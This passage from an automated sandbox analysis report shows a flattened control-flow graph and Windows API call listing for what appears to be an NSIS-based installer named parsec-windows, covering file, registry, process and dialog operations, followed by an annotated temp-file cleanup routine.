WriteFile 4137->4138 4138->4134 4139->4119 3634 40176f 3635 402da6 17 API calls 3634->3635 3636 401776 3635->3636 3637 401796 3636->3637 3638 40179e 3636->3638 3673 40653d lstrcpynW 3637->3673 3674 40653d lstrcpynW 3638->3674 3641 40179c 3645 4067c4 5 API calls 3641->3645 3642 4017a9 3643 405e0c 3 API calls 3642->3643 3644 4017af lstrcatW 3643->3644 3644->3641 3662 4017bb 3645->3662 3646 406873 2 API calls 3646->3662 3647 406008 2 API calls 3647->3662 3649 4017cd CompareFileTime 3649->3662 3650 40188d 3652 40559f 24 API calls 3650->3652 3651 401864 3653 40559f 24 API calls 3651->3653 3657 401879 3651->3657 3655 401897 3652->3655 3653->3657 3654 40653d lstrcpynW 3654->3662 3656 4032b4 31 API calls 3655->3656 3658 4018aa 3656->3658 3659 4018be SetFileTime 3658->3659 3660 4018d0 CloseHandle 3658->3660 3659->3660 3660->3657 3663 4018e1 3660->3663 3661 40657a 17 API calls 3661->3662 3662->3646 3662->3647 3662->3649 3662->3650 3662->3651 3662->3654 3662->3661 3668 405b9d MessageBoxIndirectW 3662->3668 3672 40602d GetFileAttributesW CreateFileW 3662->3672 3664 4018e6 3663->3664 3665 4018f9 3663->3665 3666 40657a 17 API calls 3664->3666 3667 40657a 17 API calls 3665->3667 3669 4018ee lstrcatW 3666->3669 3670 401901 3667->3670 3668->3662 3669->3670 3671 405b9d MessageBoxIndirectW 3670->3671 3671->3657 3672->3662 3673->3641 3674->3642 4140 401a72 4141 402d84 17 API calls 4140->4141 4142 401a7b 4141->4142 4143 402d84 17 API calls 4142->4143 4144 401a20 4143->4144 4145 401573 4146 401583 ShowWindow 4145->4146 4147 40158c 4145->4147 4146->4147 4148 402c2a 4147->4148 4149 40159a ShowWindow 4147->4149 4149->4148 4150 4023f4 4151 402da6 17 API calls 4150->4151 4152 402403 4151->4152 4153 402da6 17 API calls 4152->4153 4154 40240c 4153->4154 4155 402da6 17 API calls 4154->4155 4156 402416 GetPrivateProfileStringW 4155->4156 4157 4014f5 SetForegroundWindow 4158 402c2a 4157->4158 4159 401ff6 4160 402da6 17 API calls 4159->4160 4161 401ffd 4160->4161 4162 406873 2 API calls 4161->4162 
4163 402003 4162->4163 4165 402014 4163->4165 4166 406484 wsprintfW 4163->4166 4166->4165 4167 401b77 4168 402da6 17 API calls 4167->4168 4169 401b7e 4168->4169 4170 402d84 17 API calls 4169->4170 4171 401b87 wsprintfW 4170->4171 4172 402c2a 4171->4172 4173 40167b 4174 402da6 17 API calls 4173->4174 4175 401682 4174->4175 4176 402da6 17 API calls 4175->4176 4177 40168b 4176->4177 4178 402da6 17 API calls 4177->4178 4179 401694 MoveFileW 4178->4179 4180 4016a7 4179->4180 4186 4016a0 4179->4186 4182 406873 2 API calls 4180->4182 4184 4022f6 4180->4184 4181 401423 24 API calls 4181->4184 4183 4016b6 4182->4183 4183->4184 4185 4062fd 36 API calls 4183->4185 4185->4186 4186->4181 4187 4019ff 4188 402da6 17 API calls 4187->4188 4189 401a06 4188->4189 4190 402da6 17 API calls 4189->4190 4191 401a0f 4190->4191 4192 401a16 lstrcmpiW 4191->4192 4193 401a28 lstrcmpW 4191->4193 4194 401a1c 4192->4194 4193->4194 4195 4022ff 4196 402da6 17 API calls 4195->4196 4197 402305 4196->4197 4198 402da6 17 API calls 4197->4198 4199 40230e 4198->4199 4200 402da6 17 API calls 4199->4200 4201 402317 4200->4201 4202 406873 2 API calls 4201->4202 4203 402320 4202->4203 4204 402331 lstrlenW lstrlenW 4203->4204 4208 402324 4203->4208 4205 40559f 24 API calls 4204->4205 4207 40236f SHFileOperationW 4205->4207 4206 40559f 24 API calls 4209 40232c 4206->4209 4207->4208 4207->4209 4208->4206 4208->4209 4210 401000 4211 401037 BeginPaint GetClientRect 4210->4211 4212 40100c DefWindowProcW 4210->4212 4214 4010f3 4211->4214 4217 401179 4212->4217 4215 401073 CreateBrushIndirect FillRect DeleteObject 4214->4215 4216 4010fc 4214->4216 4215->4214 4218 401102 CreateFontIndirectW 4216->4218 4219 401167 EndPaint 4216->4219 4218->4219 4220 401112 6 API calls 4218->4220 4219->4217 4220->4219 4221 401d81 4222 401d94 GetDlgItem 4221->4222 4223 401d87 4221->4223 4225 401d8e 4222->4225 4224 402d84 17 API calls 4223->4224 4224->4225 4226 402da6 17 API calls 4225->4226 4229 401dd5 GetClientRect LoadImageW 
SendMessageW 4225->4229 4226->4229 4228 401e33 4230 401e38 DeleteObject 4228->4230 4231 401e3f 4228->4231 4229->4228 4229->4231 4230->4231 4232 401503 4233 40150b 4232->4233 4235 40151e 4232->4235 4234 402d84 17 API calls 4233->4234 4234->4235 4236 402383 4237 40238a 4236->4237 4240 40239d 4236->4240 4238 40657a 17 API calls 4237->4238 4239 402397 4238->4239 4241 405b9d MessageBoxIndirectW 4239->4241 4241->4240 4242 402c05 SendMessageW 4243 402c2a 4242->4243 4244 402c1f InvalidateRect 4242->4244 4244->4243 3194 404f06 GetDlgItem GetDlgItem 3195 404f58 7 API calls 3194->3195 3202 40517d 3194->3202 3196 404ff2 SendMessageW 3195->3196 3197 404fff DeleteObject 3195->3197 3196->3197 3198 405008 3197->3198 3199 40503f 3198->3199 3203 40657a 17 API calls 3198->3203 3249 404499 3199->3249 3200 40525f 3205 40530b 3200->3205 3211 4054fe 3200->3211 3216 4052b8 SendMessageW 3200->3216 3201 405240 3201->3200 3212 405251 SendMessageW 3201->3212 3202->3200 3202->3201 3208 4051db 3202->3208 3209 405021 SendMessageW SendMessageW 3203->3209 3206 405315 SendMessageW 3205->3206 3207 40531d 3205->3207 3206->3207 3218 405336 3207->3218 3219 40532f ImageList_Destroy 3207->3219 3235 405346 3207->3235 3257 404e54 SendMessageW 3208->3257 3209->3198 3210 405053 3215 404499 18 API calls 3210->3215 3271 404500 3211->3271 3212->3200 3230 405064 3215->3230 3216->3211 3221 4052cd SendMessageW 3216->3221 3222 40533f GlobalFree 3218->3222 3218->3235 3219->3218 3220 4054c0 3220->3211 3225 4054d2 ShowWindow GetDlgItem ShowWindow 3220->3225 3224 4052e0 3221->3224 3222->3235 3223 40513f GetWindowLongW SetWindowLongW 3226 405158 3223->3226 3236 4052f1 SendMessageW 3224->3236 3225->3211 3227 405175 3226->3227 3228 40515d ShowWindow 3226->3228 3256 4044ce SendMessageW 3227->3256 3255 4044ce SendMessageW 3228->3255 3229 4051ec 3229->3201 3230->3223 3231 40513a 3230->3231 3234 4050b7 SendMessageW 3230->3234 3238 4050f5 SendMessageW 3230->3238 3239 405109 SendMessageW 3230->3239 3231->3223 3231->3226 
3234->3230 3235->3220 3242 405381 3235->3242 3262 404ed4 3235->3262 3236->3205 3237 405170 3237->3211 3238->3230 3239->3230 3241 40548b 3243 405496 InvalidateRect 3241->3243 3246 4054a2 3241->3246 3244 4053af SendMessageW 3242->3244 3245 4053c5 3242->3245 3243->3246 3244->3245 3245->3241 3247 405439 SendMessageW SendMessageW 3245->3247 3246->3220 3252 404e0f 3246->3252 3247->3245 3250 40657a 17 API calls 3249->3250 3251 4044a4 SetDlgItemTextW 3250->3251 3251->3210 3285 404d46 3252->3285 3254 404e24 3254->3220 3255->3237 3256->3202 3258 404eb3 SendMessageW 3257->3258 3259 404e77 GetMessagePos ScreenToClient SendMessageW 3257->3259 3261 404eab 3258->3261 3260 404eb0 3259->3260 3259->3261 3260->3258 3261->3229 3293 40653d lstrcpynW 3262->3293 3264 404ee7 3294 406484 wsprintfW 3264->3294 3266 404ef1 3295 40140b 3266->3295 3270 404f01 3270->3242 3272 4045c3 3271->3272 3273 404518 GetWindowLongW 3271->3273 3273->3272 3274 40452d 3273->3274 3274->3272 3275 40455a GetSysColor 3274->3275 3276 40455d 3274->3276 3275->3276 3277 404563 SetTextColor 3276->3277 3278 40456d SetBkMode 3276->3278 3277->3278 3279 404585 GetSysColor 3278->3279 3280 40458b 3278->3280 3279->3280 3281 404592 SetBkColor 3280->3281 3282 40459c 3280->3282 3281->3282 3282->3272 3283 4045b6 CreateBrushIndirect 3282->3283 3284 4045af DeleteObject 3282->3284 3283->3272 3284->3283 3286 404d5f 3285->3286 3287 40657a 17 API calls 3286->3287 3288 404dc3 3287->3288 3289 40657a 17 API calls 3288->3289 3290 404dce 3289->3290 3291 40657a 17 API calls 3290->3291 3292 404de4 lstrlenW wsprintfW SetDlgItemTextW 3291->3292 3292->3254 3293->3264 3294->3266 3299 401389 3295->3299 3298 40653d lstrcpynW 3298->3270 3301 401390 3299->3301 3300 4013fe 3300->3298 3301->3300 3302 4013cb MulDiv SendMessageW 3301->3302 3302->3301 4245 404609 lstrlenW 4246 404628 4245->4246 4247 40462a WideCharToMultiByte 4245->4247 4246->4247 3303 40248a 3304 402da6 17 API calls 3303->3304 3305 40249c 3304->3305 3306 402da6 17 API calls 3305->3306 
3307 4024a6 3306->3307 3320 402e36 3307->3320 3310 40292e 3311 4024de 3313 4024ea 3311->3313 3315 402d84 17 API calls 3311->3315 3312 402da6 17 API calls 3314 4024d4 lstrlenW 3312->3314 3316 402509 RegSetValueExW 3313->3316 3324 4032b4 3313->3324 3314->3311 3315->3313 3317 40251f RegCloseKey 3316->3317 3317->3310 3321 402e51 3320->3321 3344 4063d8 3321->3344 3325 4032cd 3324->3325 3326 4032fb 3325->3326 3351 4034e5 SetFilePointer 3325->3351 3348 4034cf 3326->3348 3330 403468 3332 4034aa 3330->3332 3336 40346c 3330->3336 3331 403318 GetTickCount 3338 403452 3331->3338 3343 403367 3331->3343 3333 4034cf ReadFile 3332->3333 3333->3338 3334 4034cf ReadFile 3334->3343 3335 4034cf ReadFile 3335->3336 3336->3335 3337 4060df WriteFile 3336->3337 3336->3338 3337->3336 3338->3316 3339 4033bd GetTickCount 3339->3343 3340 4033e2 MulDiv wsprintfW 3341 40559f 24 API calls 3340->3341 3341->3343 3342 4060df WriteFile 3342->3343 3343->3334 3343->3338 3343->3339 3343->3340 3343->3342 3345 4063e7 3344->3345 3346 4063f2 RegCreateKeyExW 3345->3346 3347 4024b6 3345->3347 3346->3347 3347->3310 3347->3311 3347->3312 3349 4060b0 ReadFile 3348->3349 3350 403306 3349->3350 3350->3330 3350->3331 3350->3338 3351->3326 4248 40498a 4249 4049b6 4248->4249 4250 4049c7 4248->4250 4309 405b81 GetDlgItemTextW 4249->4309 4252 4049d3 GetDlgItem 4250->4252 4257 404a32 4250->4257 4254 4049e7 4252->4254 4253 4049c1 4256 4067c4 5 API calls 4253->4256 4259 4049fb SetWindowTextW 4254->4259 4264 405eb7 4 API calls 4254->4264 4255 404b16 4307 404cc5 4255->4307 4311 405b81 GetDlgItemTextW 4255->4311 4256->4250 4257->4255 4261 40657a 17 API calls 4257->4261 4257->4307 4262 404499 18 API calls 4259->4262 4260 404b46 4265 405f14 18 API calls 4260->4265 4266 404aa6 SHBrowseForFolderW 4261->4266 4267 404a17 4262->4267 4263 404500 8 API calls 4268 404cd9 4263->4268 4269 4049f1 4264->4269 4270 404b4c 4265->4270 4266->4255 4271 404abe CoTaskMemFree 4266->4271 4272 404499 18 API calls 4267->4272 4269->4259 4273 405e0c 3 
API calls 4269->4273 4312 40653d lstrcpynW 4270->4312 4274 405e0c 3 API calls 4271->4274 4275 404a25 4272->4275 4273->4259 4276 404acb 4274->4276 4310 4044ce SendMessageW 4275->4310 4279 404b02 SetDlgItemTextW 4276->4279 4284 40657a 17 API calls 4276->4284 4279->4255 4280 404a2b 4282 40690a 5 API calls 4280->4282 4281 404b63 4283 40690a 5 API calls 4281->4283 4282->4257 4291 404b6a 4283->4291 4285 404aea lstrcmpiW 4284->4285 4285->4279 4288 404afb lstrcatW 4285->4288 4286 404bab 4313 40653d lstrcpynW 4286->4313 4288->4279 4289 404bb2 4290 405eb7 4 API calls 4289->4290 4292 404bb8 GetDiskFreeSpaceW 4290->4292 4291->4286 4294 405e58 2 API calls 4291->4294 4296 404c03 4291->4296 4295 404bdc MulDiv 4292->4295 4292->4296 4294->4291 4295->4296 4297 404c74 4296->4297 4298 404e0f 20 API calls 4296->4298 4299 404c97 4297->4299 4300 40140b 2 API calls 4297->4300 4301 404c61 4298->4301 4314 4044bb KiUserCallbackDispatcher 4299->4314 4300->4299 4303 404c76 SetDlgItemTextW 4301->4303 4304 404c66 4301->4304 4303->4297 4306 404d46 20 API calls 4304->4306 4305 404cb3 4305->4307 4308 4048e3 SendMessageW 4305->4308 4306->4297 4307->4263 4308->4307 4309->4253 4310->4280 4311->4260 4312->4281 4313->4289 4314->4305 3385 40290b 3386 402da6 17 API calls 3385->3386 3387 402912 FindFirstFileW 3386->3387 3388 40293a 3387->3388 3392 402925 3387->3392 3393 406484 wsprintfW 3388->3393 3390 402943 3394 40653d lstrcpynW 3390->3394 3393->3390 3394->3392 4315 40190c 4316 401943 4315->4316 4317 402da6 17 API calls 4316->4317 4318 401948 4317->4318 4319 405c49 67 API calls 4318->4319 4320 401951 4319->4320 4321 40190f 4322 402da6 17 API calls 4321->4322 4323 401916 4322->4323 4324 405b9d MessageBoxIndirectW 4323->4324 4325 40191f 4324->4325 3705 402891 3706 402898 3705->3706 3708 402ba9 3705->3708 3707 402d84 17 API calls 3706->3707 3709 40289f 3707->3709 3710 4028ae SetFilePointer 3709->3710 3710->3708 3711 4028be 3710->3711 3713 406484 wsprintfW 3711->3713 3713->3708 4326 401491 4327 40559f 24 API 
calls 4326->4327 4328 401498 4327->4328 3714 403b12 3715 403b2a 3714->3715 3716 403b1c CloseHandle 3714->3716 3721 403b57 3715->3721 3716->3715 3719 405c49 67 API calls 3720 403b3b 3719->3720 3723 403b65 3721->3723 3722 403b2f 3722->3719 3723->3722 3724 403b6a FreeLibrary GlobalFree 3723->3724 3724->3722 3724->3724 4329 401f12 4330 402da6 17 API calls 4329->4330 4331 401f18 4330->4331 4332 402da6 17 API calls 4331->4332 4333 401f21 4332->4333 4334 402da6 17 API calls 4333->4334 4335 401f2a 4334->4335 4336 402da6 17 API calls 4335->4336 4337 401f33 4336->4337 4338 401423 24 API calls 4337->4338 4339 401f3a 4338->4339 4346 405b63 ShellExecuteExW 4339->4346 4341 401f82 4342 40292e 4341->4342 4343 4069b5 5 API calls 4341->4343 4344 401f9f CloseHandle 4343->4344 4344->4342 4346->4341 3725 405513 3726 405523 3725->3726 3727 405537 3725->3727 3728 405580 3726->3728 3729 405529 3726->3729 3730 40553f IsWindowVisible 3727->3730 3737 40555f 3727->3737 3731 405585 CallWindowProcW 3728->3731 3732 4044e5 SendMessageW 3729->3732 3730->3728 3733 40554c 3730->3733 3734 405533 3731->3734 3732->3734 3735 404e54 5 API calls 3733->3735 3736 405556 3735->3736 3736->3737 3737->3731 3738 404ed4 4 API calls 3737->3738 3738->3728 4347 402f93 4348 402fa5 SetTimer 4347->4348 4349 402fbe 4347->4349 4348->4349 4350 403013 4349->4350 4351 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4349->4351 4351->4350 4352 401d17 4353 402d84 17 API calls 4352->4353 4354 401d1d IsWindow 4353->4354 4355 401a20 4354->4355 3802 403f9a 3803 403fb2 3802->3803 3804 404113 3802->3804 3803->3804 3805 403fbe 3803->3805 3806 404164 3804->3806 3807 404124 GetDlgItem GetDlgItem 3804->3807 3808 403fc9 SetWindowPos 3805->3808 3809 403fdc 3805->3809 3811 4041be 3806->3811 3822 401389 2 API calls 3806->3822 3810 404499 18 API calls 3807->3810 3808->3809 3813 403fe5 ShowWindow 3809->3813 3814 404027 3809->3814 3815 40414e SetClassLongW 3810->3815 3812 4044e5 SendMessageW 3811->3812 3816 40410e 3811->3816 3844 4041d0 
3812->3844 3817 4040d1 3813->3817 3818 404005 GetWindowLongW 3813->3818 3819 404046 3814->3819 3820 40402f DestroyWindow 3814->3820 3821 40140b 2 API calls 3815->3821 3823 404500 8 API calls 3817->3823 3818->3817 3824 40401e ShowWindow 3818->3824 3826 40404b SetWindowLongW 3819->3826 3827 40405c 3819->3827 3825 404422 3820->3825 3821->3806 3828 404196 3822->3828 3823->3816 3824->3814 3825->3816 3833 404453 ShowWindow 3825->3833 3826->3816 3827->3817 3831 404068 GetDlgItem 3827->3831 3828->3811 3832 40419a SendMessageW 3828->3832 3829 40140b 2 API calls 3829->3844 3830 404424 DestroyWindow KiUserCallbackDispatcher 3830->3825 3834 404096 3831->3834 3835 404079 SendMessageW IsWindowEnabled 3831->3835 3832->3816 3833->3816 3837 4040a3 3834->3837 3838 4040ea SendMessageW 3834->3838 3839 4040b6 3834->3839 3847 40409b 3834->3847 3835->3816 3835->3834 3836 40657a 17 API calls 3836->3844 3837->3838 3837->3847 3838->3817 3842 4040d3 3839->3842 3843 4040be 3839->3843 3841 404499 18 API calls 3841->3844 3846 40140b 2 API calls 3842->3846 3845 40140b 2 API calls 3843->3845 3844->3816 3844->3829 3844->3830 3844->3836 3844->3841 3848 404499 18 API calls 3844->3848 3864 404364 DestroyWindow 3844->3864 3845->3847 3846->3847 3847->3817 3876 404472 3847->3876 3849 40424b GetDlgItem 3848->3849 3850 404260 3849->3850 3851 404268 ShowWindow KiUserCallbackDispatcher 3849->3851 3850->3851 3873 4044bb KiUserCallbackDispatcher 3851->3873 3853 404292 KiUserCallbackDispatcher 3858 4042a6 3853->3858 3854 4042ab GetSystemMenu EnableMenuItem SendMessageW 3855 4042db SendMessageW 3854->3855 3854->3858 3855->3858 3857 403f7b 18 API calls 3857->3858 3858->3854 3858->3857 3874 4044ce SendMessageW 3858->3874 3875 40653d lstrcpynW 3858->3875 3860 40430a lstrlenW 3861 40657a 17 API calls 3860->3861 3862 404320 SetWindowTextW 3861->3862 3863 401389 2 API calls 3862->3863 3863->3844 3864->3825 3865 40437e CreateDialogParamW 3864->3865 3865->3825 3866 4043b1 3865->3866 3867 404499 18 API calls 3866->3867 
3868 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3867->3868 3869 401389 2 API calls 3868->3869 3870 404402 3869->3870 3870->3816 3871 40440a ShowWindow 3870->3871 3872 4044e5 SendMessageW 3871->3872 3872->3825 3873->3853 3874->3858 3875->3860 3877 404479 3876->3877 3878 40447f SendMessageW 3876->3878 3877->3878 3878->3817 3879 401b9b 3880 401ba8 3879->3880 3881 401bec 3879->3881 3884 401c31 3880->3884 3889 401bbf 3880->3889 3882 401bf1 3881->3882 3883 401c16 GlobalAlloc 3881->3883 3895 40239d 3882->3895 3900 40653d lstrcpynW 3882->3900 3886 40657a 17 API calls 3883->3886 3885 40657a 17 API calls 3884->3885 3884->3895 3887 402397 3885->3887 3886->3884 3892 405b9d MessageBoxIndirectW 3887->3892 3898 40653d lstrcpynW 3889->3898 3890 401c03 GlobalFree 3890->3895 3892->3895 3893 401bce 3899 40653d lstrcpynW 3893->3899 3896 401bdd 3901 40653d lstrcpynW 3896->3901 3898->3893 3899->3896 3900->3890 3901->3895 4356 40261c 4357 402da6 17 API calls 4356->4357 4358 402623 4357->4358 4361 40602d GetFileAttributesW CreateFileW 4358->4361 4360 40262f 4361->4360 3964 40259e 3965 402de6 17 API calls 3964->3965 3966 4025a8 3965->3966 3967 402d84 17 API calls 3966->3967 3968 4025b1 3967->3968 3969 40292e 3968->3969 3970 4025d9 RegEnumValueW 3968->3970 3971 4025cd RegEnumKeyW 3968->3971 3972 4025ee 3970->3972 3973 4025f5 RegCloseKey 3970->3973 3971->3973 3972->3973 3973->3969 4362 40149e 4363 4014ac PostQuitMessage 4362->4363 4364 40239d 4362->4364 4363->4364 4365 4015a3 4366 402da6 17 API calls 4365->4366 4367 4015aa SetFileAttributesW 4366->4367 4368 4015bc 4367->4368 3168 401fa4 3169 402da6 17 API calls 3168->3169 3170 401faa 3169->3170 3171 40559f 24 API calls 3170->3171 3172 401fb4 3171->3172 3181 405b20 CreateProcessW 3172->3181 3175 401fdd CloseHandle 3178 40292e 3175->3178 3179 401fcf 3179->3175 3189 406484 wsprintfW 3179->3189 3182 405b53 CloseHandle 3181->3182 3183 401fba 3181->3183 3182->3183 3183->3175 3183->3178 3184 4069b5 WaitForSingleObject 3183->3184 
3185 4069cf 3184->3185 3186 4069e1 GetExitCodeProcess 3185->3186 3190 406946 3185->3190 3186->3179 3189->3175 3191 406963 PeekMessageW 3190->3191 3192 406973 WaitForSingleObject 3191->3192 3193 406959 DispatchMessageW 3191->3193 3192->3185 3193->3191 3352 4021aa 3353 402da6 17 API calls 3352->3353 3354 4021b1 3353->3354 3355 402da6 17 API calls 3354->3355 3356 4021bb 3355->3356 3357 402da6 17 API calls 3356->3357 3358 4021c5 3357->3358 3359 402da6 17 API calls 3358->3359 3360 4021cf 3359->3360 3361 402da6 17 API calls 3360->3361 3362 4021d9 3361->3362 3363 402218 CoCreateInstance 3362->3363 3364 402da6 17 API calls 3362->3364 3367 402237 3363->3367 3364->3363 3365 401423 24 API calls 3366 4022f6 3365->3366 3367->3365 3367->3366 3368 40252a 3379 402de6 3368->3379 3371 402da6 17 API calls 3372 40253d 3371->3372 3373 402548 RegQueryValueExW 3372->3373 3378 40292e 3372->3378 3374 40256e RegCloseKey 3373->3374 3375 402568 3373->3375 3374->3378 3375->3374 3384 406484 wsprintfW 3375->3384 3380 402da6 17 API calls 3379->3380 3381 402dfd 3380->3381 3382 4063aa RegOpenKeyExW 3381->3382 3383 402534 3382->3383 3383->3371 3384->3374 4369 40202a 4370 402da6 17 API calls 4369->4370 4371 402031 4370->4371 4372 40690a 5 API calls 4371->4372 4373 402040 4372->4373 4374 40205c GlobalAlloc 4373->4374 4377 4020cc 4373->4377 4375 402070 4374->4375 4374->4377 4376 40690a 5 API calls 4375->4376 4378 402077 4376->4378 4379 40690a 5 API calls 4378->4379 4380 402081 4379->4380 4380->4377 4384 406484 wsprintfW 4380->4384 4382 4020ba 4385 406484 wsprintfW 4382->4385 4384->4382 4385->4377 4386 403baa 4387 403bb5 4386->4387 4388 403bbc GlobalAlloc 4387->4388 4389 403bb9 4387->4389 4388->4389 3395 40352d SetErrorMode GetVersionExW 3396 4035b7 3395->3396 3397 40357f GetVersionExW 3395->3397 3398 403610 3396->3398 3399 40690a 5 API calls 3396->3399 3397->3396 3400 40689a 3 API calls 3398->3400 3399->3398 3401 403626 lstrlenA 3400->3401 3401->3398 3402 403636 3401->3402 3403 40690a 5 API calls 
3402->3403 3404 40363d 3403->3404 3405 40690a 5 API calls 3404->3405 3406 403644 3405->3406 3407 40690a 5 API calls 3406->3407 3411 403650 #17 OleInitialize SHGetFileInfoW 3407->3411 3410 40369d GetCommandLineW 3486 40653d lstrcpynW 3410->3486 3485 40653d lstrcpynW 3411->3485 3413 4036af 3414 405e39 CharNextW 3413->3414 3415 4036d5 CharNextW 3414->3415 3427 4036e6 3415->3427 3416 4037e4 3417 4037f8 GetTempPathW 3416->3417 3487 4034fc 3417->3487 3419 403810 3421 403814 GetWindowsDirectoryW lstrcatW 3419->3421 3422 40386a DeleteFileW 3419->3422 3420 405e39 CharNextW 3420->3427 3423 4034fc 12 API calls 3421->3423 3497 40307d GetTickCount GetModuleFileNameW 3422->3497 3425 403830 3423->3425 3425->3422 3428 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3425->3428 3426 40387d 3430 403a59 ExitProcess CoUninitialize 3426->3430 3432 403932 3426->3432 3440 405e39 CharNextW 3426->3440 3427->3416 3427->3420 3429 4037e6 3427->3429 3431 4034fc 12 API calls 3428->3431 3581 40653d lstrcpynW 3429->3581 3434 403a69 3430->3434 3435 403a7e 3430->3435 3439 403862 3431->3439 3525 403bec 3432->3525 3586 405b9d 3434->3586 3437 403a86 GetCurrentProcess OpenProcessToken 3435->3437 3438 403afc ExitProcess 3435->3438 3443 403acc 3437->3443 3444 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3437->3444 3439->3422 3439->3430 3454 40389f 3440->3454 3447 40690a 5 API calls 3443->3447 3444->3443 3445 403941 3445->3430 3450 403ad3 3447->3450 3448 403908 3451 405f14 18 API calls 3448->3451 3449 403949 3453 405b08 5 API calls 3449->3453 3452 403ae8 ExitWindowsEx 3450->3452 3456 403af5 3450->3456 3455 403914 3451->3455 3452->3438 3452->3456 3457 40394e lstrcatW 3453->3457 3454->3448 3454->3449 3455->3430 3582 40653d lstrcpynW 3455->3582 3460 40140b 2 API calls 3456->3460 3458 40396a lstrcatW lstrcmpiW 3457->3458 3459 40395f lstrcatW 3457->3459 3458->3445 3461 40398a 3458->3461 3459->3458 3460->3438 3463 403996 3461->3463 3464 40398f 3461->3464 3467 405aeb 2 API calls 
3463->3467 3466 405a6e 4 API calls 3464->3466 3465 403927 3583 40653d lstrcpynW 3465->3583 3469 403994 3466->3469 3470 40399b SetCurrentDirectoryW 3467->3470 3469->3470 3471 4039b8 3470->3471 3472 4039ad 3470->3472 3585 40653d lstrcpynW 3471->3585 3584 40653d lstrcpynW 3472->3584 3475 40657a 17 API calls 3476 4039fa DeleteFileW 3475->3476 3477 403a06 CopyFileW 3476->3477 3482 4039c5 3476->3482 3477->3482 3478 403a50 3480 4062fd 36 API calls 3478->3480 3479 4062fd 36 API calls 3479->3482 3480->3445 3481 40657a 17 API calls 3481->3482 3482->3475 3482->3478 3482->3479 3482->3481 3483 405b20 2 API calls 3482->3483 3484 403a3a CloseHandle 3482->3484 3483->3482 3484->3482 3485->3410 3486->3413 3488 4067c4 5 API calls 3487->3488 3490 403508 3488->3490 3489 403512 3489->3419 3490->3489 3491 405e0c 3 API calls 3490->3491 3492 40351a 3491->3492 3493 405aeb 2 API calls 3492->3493 3494 403520 3493->3494 3590 40605c 3494->3590 3594 40602d GetFileAttributesW CreateFileW 3497->3594 3499 4030bd 3517 4030cd 3499->3517 3595 40653d lstrcpynW 3499->3595 3501 4030e3 3502 405e58 2 API calls 3501->3502 3503 4030e9 3502->3503 3596 40653d lstrcpynW 3503->3596 3505 4030f4 GetFileSize 3506 4031ee 3505->3506 3524 40310b 3505->3524 3597 403019 3506->3597 3508 4031f7 3510 403227 GlobalAlloc 3508->3510 3508->3517 3609 4034e5 SetFilePointer 3508->3609 3509 4034cf ReadFile 3509->3524 3608 4034e5 SetFilePointer 3510->3608 3512 40325a 3514 403019 6 API calls 3512->3514 3514->3517 3515 403210 3518 4034cf ReadFile 3515->3518 3516 403242 3519 4032b4 31 API calls 3516->3519 3517->3426 3520 40321b 3518->3520 3522 40324e 3519->3522 3520->3510 3520->3517 3521 403019 6 API calls 3521->3524 3522->3517 3522->3522 3523 40328b SetFilePointer 3522->3523 3523->3517 3524->3506 3524->3509 3524->3512 3524->3517 3524->3521 3526 40690a 5 API calls 3525->3526 3527 403c00 3526->3527 3528 403c06 3527->3528 3529 403c18 3527->3529 3625 406484 wsprintfW 3528->3625 3530 40640b 3 API calls 3529->3530 3531 403c48 3530->3531 

                              Control-flow Graph (function starting at 00405C49)
                              APIs
                              • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBA
                              • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CDD
                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                              • FindClose.KERNEL32(00000000), ref: 00405DA2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj258A.tmp\*.*$\*.*
                              APIs
                              • FindFirstFileW.KERNELBASE(75923420,004302B8,C:\,00405F5D,C:\,C:\,00000000,C:\,C:\,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                              • FindClose.KERNELBASE(00000000), ref: 0040688A
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID: C:\
